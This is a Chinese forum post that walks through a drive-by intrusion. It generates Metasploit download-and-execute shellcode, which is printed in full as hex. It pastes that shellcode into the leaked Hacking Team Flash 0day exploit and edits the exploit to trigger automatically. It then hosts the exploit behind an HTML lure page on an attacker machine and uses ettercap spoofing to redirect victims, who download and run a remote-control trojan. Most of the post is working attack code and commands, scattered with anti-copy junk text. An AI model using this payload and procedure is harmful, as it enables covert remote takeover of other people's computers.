中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

' Y m1 a" T1 N& J! O$ g) W5 w 三、flash 0day之手工代码修改制作下载者实例入侵演示 ^+ }" H( s! B$ f

$ \2 A9 w$ i7 Y3 A$ k: q6 @8 e; R

0 {6 | ?9 F! M$ G( r6 }8 v4 @ 利用到的工具: 9 P7 P, @8 v$ j* O" U, G

, E' w7 `8 H/ w; u& Y7 E0 n

$ E5 ~/ J1 u& ^: E Msf % @. z9 H7 o' d0 [

2 L- o% T2 [3 U2 w! ^: _4 s

5 V: |( d( V7 k' I, M Ettercap * h+ P* Z# Q% w. R3 i0 C) @

% r$ y5 [. L5 J6 {

; y7 @8 p4 }* q. J Adobe Flash CS6 , q, C* ?0 \+ ^1 N2 m8 G

! X E1 u4 E$ i' x% Y' \: o

; |" O; `; f4 M6 `6 m Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 6 i* ^* f1 K. i

4 g9 {+ g0 }# |" a: U E* L) E

/ k2 p4 A! u; x9 P" K1 R0 t' X! c 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 6 c! O. P3 J7 i7 e

y1 |. T! K- v! i1 \' Z# I# U5 u

( X9 Z: N& {) u8 T, ~1 a2 F6 y 如图: - O9 B/ y# w' L

7 C. ?6 O; P2 ^4 e; U3 p6 `

# |9 z/ ?( b6 \; p( b3 [6 ^1 s   % U; h7 z0 @3 X: L8 [) d

4 |6 k4 \' U8 A6 J9 Q

6 w. Z# P# p8 B0 a( b   : A# i- ~3 E+ B8 D1 ~6 c# q7 A

; h* k- b2 g, j

8 o: j. x% Y5 Z2 J6 T' { 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ; U: j, K% C) \" q N! l" M! r

; B3 p& X( Z* C9 O

3 W+ y1 R& n8 c1 ~   : D) {8 Z) J r

7 a h B2 R4 i1 M

! X3 W w6 o ~, l% e   , E* X F4 U' Y G, D1 J

( X' F! P: L/ |) ?' z

! t0 Z* d& ^" q& P2 c. m 然后执行generate -t dword生成shellcode,如下: 8 W4 \6 `+ `3 K: `

% i( {" `3 P& K d: F- q

3 s; d! M& w/ }. J   1 P/ n8 e: l/ o; ^. r! k$ Q

- j" i: s# j7 M6 @: Y6 M

: o L) \7 |6 [# g 复制代码到文本下便于我们一会编辑flash exp,如下: 9 D, L, t$ a+ e0 b; q3 d

. n, G+ P0 ] _( N$ {

6 ?% X' U6 x" O 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, % z& }; D u9 K; n7 \2 x

6 F* M% T: p, Q5 C

0 n8 F( C- \+ N( c$ M- }4 A 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, + x9 @( \7 ?7 [" g6 v

+ t# }4 `/ y5 v0 _: c: X! f

6 ?- a3 ^1 E; x1 i4 V+ T 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 4 k6 p# ]9 Q5 Z

: n& p4 L6 P1 f: i9 G. Q4 e7 A

1 q: F1 U( v8 E 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ) k0 S+ v2 ]* h3 b. d

# s% H: P% y F* p$ M9 f$ ^

$ T* i4 H; x; u) O3 z7 } 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, & Y0 m, o8 N" y- O& G" `

/ }& ~; W' h1 c' l" k2 D$ {

3 {; B2 n2 K1 E 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 5 p% G4 o% w) i+ I

5 H! R8 F9 k; n9 O9 } u" F

; ]) m+ t( v" A 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ! _8 c1 ~# W9 K0 q! a

. a+ w5 G/ C% _$ r& ~6 v$ y

- C$ P( B3 k. n8 @) U 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, & L8 o* E1 I8 h! w

! Q, o, a! w# L( m3 s: m

5 B' U' u0 j/ ?5 {' |% q 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 8 L: }+ r( L# `; {" ~

6 E/ d3 r* y9 @, U+ s1 O4 u! y

6 V% n+ b2 n( i6 x. w; O# C/ E 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 1 o' k! `; u7 [$ a

- F* K$ a6 {7 ^) Z* m

/ Y; E2 B- y7 P! Z6 i: p4 F 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 3 |9 ^: v6 O' k, _

0 l1 T3 z7 S6 M8 a- I: q l% F

7 O5 H: y/ u# U 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, & N( G" c6 a' Z5 \

. N2 n7 o5 D* u2 r

/ O, D1 I, x: \! n2 C& B0 D 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, + ~1 v8 a' c! T

( ` a4 w, w$ Z4 u

. G$ s8 N7 ?* x8 r; l! G- f& C 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 8 g* ]+ P2 H5 `5 b) U: J: S4 j* P. ?/ A

+ ] Y# U3 y( U8 i

! ?$ n6 p6 }& x# l   ' H* G# h, E% C2 W7 j- g

9 {+ f$ w1 A' U. c7 @3 {7 r

: |' K; }# Q. r   / \* i# A, E4 _. W7 u

& X C D* x0 G/ v0 R9 M _& {3 x

9 b! \, d5 ]) F 下面我们来修改flash 0day exp,需要修改三个文件,分别为: - _! M* |& F: y" ^5 K1 c0 s* e( t# I$ I

/ X ]* }2 y( Z

7 a7 K) D3 ?4 T# T6 }: m. Y   1 z0 N% L8 [: r8 r8 q

2 B% a; I: A1 s: y! {2 ]

- p$ J$ V k+ a9 `: j' P, Y4 D 先修改ShellWin32.as,部分源代码如图: 2 [# j! @. a( }+ u! x: I' \* P% u

0 h5 \+ i8 L9 A; S

; S5 B) e% z' g; U- O& N5 \   ) m3 k; B% Y" e; I4 M/ u% F4 [

/ b- ?7 a( u% X) K# \

& r' A2 ~9 \3 r/ c1 p3 b 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ( w/ i" b8 f0 z* `: X

, |+ N) Y% J# A# f; x

* u' @$ W# D8 K# O   ! Q6 b4 J- f6 o/ H7 y" m

- B7 Q: ]% j/ F. g

9 G4 a% \3 B/ z4 ~/ z: H h 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: * W! b" @1 W& D5 R

! t: l- m0 ~6 H7 Z

( E7 I% c0 v8 k$ p4 J/ t/ G) ?; I   . i, Z5 A$ N1 \7 j

/ _9 ?. m; E; k' g( m% r8 x1 V" J

5 l' @! @1 Z3 j x4 ?4 \ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ( q( \6 |7 y J. c& Y9 S9 Z0 d. T

" _! S" |2 d R# R9 i; N. L

! ~" E$ {% T9 Z: S2 U7 r: O1 _   & G7 P0 u5 f, I0 f6 ~- C6 V0 s7 F

6 b' _" _9 x" r) |& V1 Z

0 G0 X- F0 O- i$ \   ; d9 `& l g8 N/ p

) \' F* T- y4 y- P

- ]2 R3 ^+ E$ l   # m8 y6 y3 |; u( A2 z) Y

( m/ \" t5 `: W& H$ S

- }5 g' E% X+ p; s! a 然后点保存,下面我们来编译一下,打开 V* e4 t: Z4 r3 m* l$ ^, f0 i4 h

, Y& Q" z, a2 A1 z( g, B

# M) B/ F1 B! F |7 ?3 O! M9 Y exp1.fla然后点文件-发布,看看编译没错误 U# Y0 r3 f+ S

7 K; o$ d* [! \. A' Z& [8 l7 h

3 ~( c2 O0 K* i3 ?( T2 L   ) d# j! V, s" F; {; c0 b

. h0 ? v7 W" M1 T

. t7 ~, q; N5 k" [   8 |+ F! D5 D" {" E! K0 _

, X! j; i) b0 j$ u, W( }3 O

, o8 D1 F1 P+ P4 R$ ]: S   $ w+ O8 o9 q) P. q' d

s& k7 H8 O# |5 w- M6 t0 s) P6 S

8 `# ]2 Z7 P- m/ @+ P k% ?; ~   ! v+ ] i1 B- R3 Y) J/ V- F: B/ }

: G0 C2 s6 T7 m K( E

. \ L! |3 z& y- ] 然后我们把生成的 , K9 s# o7 y2 s' ^+ L: x9 Y

* v# K% v9 z; \) q8 ^; @( I4 v* j

& J0 l, W# ?7 U# S exp1.swf丢到kailinux /var/www/html下: 2 D3 ?) ?9 J# D4 I

3 r, L% v" C$ d6 B- `, o3 d

; H' O& z2 P7 r! U3 e# J 然后把这段代码好好编辑一下 # n5 l" k- q" Y

/ V; A" z1 f, j, \/ X4 d4 l

4 G8 c# L8 r. n   2 S7 e `0 v8 H% y7 ~

7 {: [+ o0 t* U3 P- [( g6 C

* F( L" @3 U, X: ]( S9 B7 [- \   2 E0 A. f4 T- c# B, T

; J, q6 E7 X+ d0 f* A

& Y! l3 ~3 x$ D   . L2 ]: K! u+ v; }

! }( r6 I3 l8 O1 G& Z

( E" m6 N' t- @, c% l- T   / r) ^: ? A( r# G0 I1 O

% O% o9 K/ b; F7 ?% z( C' I$ q4 |

. `7 U i' M( ~; h   0 u! s5 v; I( ` O

; W' _7 U! j# p$ {

" @+ k% L# ^7 @4 F* d! G ~9 q, t" Y% @   ) f: Z4 m! A) T" L

5 b$ N V/ [1 \- ]: `2 B

' ]' L1 D Y3 J% c1 n <!DOCTYPE html> ( U8 @. t% _1 O, Q( _2 F3 `% S, Q

z; K7 l( S1 Y# k) d% Z( K; t

/ P: {; `+ E$ U2 h# B+ z j' p/ Z7 D Y <html> 4 ?' C( B$ M& h

z. t+ _, _& @8 e1 e2 [1 e4 K; ~

" e7 @8 _; p) k d9 d <head> 2 X# M/ M, m$ v: C

$ m6 g3 l. g* W$ f: o5 e( w

4 Z; b- A, L/ D0 S3 `5 D2 P/ E <meta http-equiv="Content-Type" content="text/html; , S$ ~/ u. J u: }* [

- a( I. W- A$ {) \7 q

8 [* p( i" ~0 B6 B charset=utf-8"/> " |7 Y6 N2 D" @0 h: _

$ b3 e5 N3 T! Z3 x

' I6 z0 [8 d5 e2 M4 S$ Q </head> 3 `" I% h2 S0 w6 D& c9 t

' Q) V! i5 b) T* B% l* e0 G9 X

( x2 c( f! @3 Y <body> $ @" s c5 H1 F9 o; O: W

7 M# n) _9 Q" G u, K2 y

- e+ f3 R$ Z$ r: u% S( T <h2> Please wait, the requested page is loading...</h2> 5 [# \# v* J8 p, b- _0 V6 |, {

Q2 W2 ?, h2 @, M3 q

+ e$ m! T' T9 d( }3 a, C0 V, Y <br> % N9 n k* i+ U" U$ @

1 S) J9 a4 C' c5 I8 o) p- k

, w* l4 h+ ^% _4 I <OBJECT # ?9 M) L! F4 Z+ E+ ?: p; m3 U

# `2 d) a" c7 c% }8 R

6 h- p% o2 U, \2 u9 c classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie . V- r/ o% R4 b

/ m9 Z1 F. [" `% n9 X! E. l

5 H4 i/ o. B7 }, j3 g4 R) O VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ) }+ g8 Y) |9 X% M4 }+ T0 a; ~

- ^4 m$ M/ D. R1 u6 L. \

. x: R$ s* v" m </body> 8 J# ~( N# I9 X% x5 R' M

3 t* s' V f9 Y2 X) }. j$ V$ X

4 V1 A& J ?8 P0 t <script> " J1 H5 s G$ F$ y

@2 j, k3 A$ R! g

* m! c% @& T4 Q! f& s     setTimeout(function () { 5 H' @: a2 S% E7 m% }

8 r+ ]* X8 X1 _

5 ]0 b! R( |9 @! {* Z          - C) \5 u9 }, p6 p6 {1 `* O

0 `+ M; |: F- x! ?1 C1 X

4 i, r( s0 E, h# @; P0 z8 c: k window.location.reload(); 8 P$ Q* x6 e4 U- V6 o0 Q# J

7 b2 b, I; n; ?$ z, ?1 p; J

6 Y2 y3 Q1 @* S# A c$ @! o- g     }, 10000); p( T$ n9 p- k1 V. O3 Y

# p* D4 T1 c b2 G C7 B

' m* f; {* c: W8 Y   : u6 M1 v2 Z: O( T) ^8 T

4 ]4 t( l( L; T _

* i/ }' D( [" }: U% _ </script> # Z* H* ]: v$ J7 a) C. p2 @3 w

# C) I. I m" g3 p/ N8 X9 B$ }

, b( y( W+ g( q) o0 h- C9 C; M </html> / b- a/ m8 a0 `7 y& V2 T# T

3 R- S. G$ r# H

5 R5 P1 h6 a$ H/ Q& s* B1 i1 ?& v   . J8 o$ I0 P' Q; w

# X& Q5 ^; l1 B4 _

% X% { w8 }" M+ U 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ) j8 k# ^, f7 }) m( a9 V

, ?# S9 O4 G6 W/ l2 c

0 l& Q/ f. l2 R' }3 B% X   5 O' O+ K/ X# w# {

3 q) l; c6 ]* e* l$ ]

. j3 L% M! I; ?   ! F7 n& q/ D5 M; p9 I

' F! a0 K% U; R0 Z: e

1 O9 ^5 j8 d: j% W# f# J2 G S   ; _1 T- z: i# L% G+ L$ i5 U% D

! z5 K2 b6 G, b( J5 b

: L; ~4 f' U. R6 E0 p   ) v/ |& W5 {+ Q- I) u

* Y' H3 O' G* Y" S

Q6 j+ O( q) c2 L7 z: l! M   % W3 r. u4 \1 J$ f3 b# w; }3 P

; [. P/ {* b' c

h% O3 H, j8 U$ P 下面我们用ettercap欺骗如图: ! K$ H% r! \, u+ O+ J/ I6 a7 a) G

1 ^2 O' V5 M* s, e( D8 ^4 V+ w, N

9 ^1 B% _- w% c- ]   * O3 e* F5 K. g- e6 S U

- E' U3 u* ]' |" j

. h4 I* A7 t; G2 d: p% p, m. ]   5 g* O$ O" q) ]. H/ t

6 p% S! O5 R# z2 d" e; d$ `

e$ z j6 Q- x( i 下面我们随便访问个网站看看: 7 g; z* {5 ~* W. A% E$ p

; H! ~+ h/ N+ X3 W

; D4 x! v8 `! X, ` 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 1 G6 D4 T O7 u$ B8 ~. P

6 k/ l7 C) _) N* m' v3 d3 y

5 x2 T% ]; ?7 }5 t   - f) Q2 z8 a" c- Y, y

# e, ?( U8 O* m N* F V3 P# H* |

7 T# I; l* g! v& [" ` 我们看另一台, + }; w' H) ?1 o& Z7 o

5 A4 S( v# @7 Z4 @9 S

+ b3 }: o# s' s4 _) d2 U( B4 Z, b) r 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 h4 i" m3 J+ _% X$ `2 @, f0 Q






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2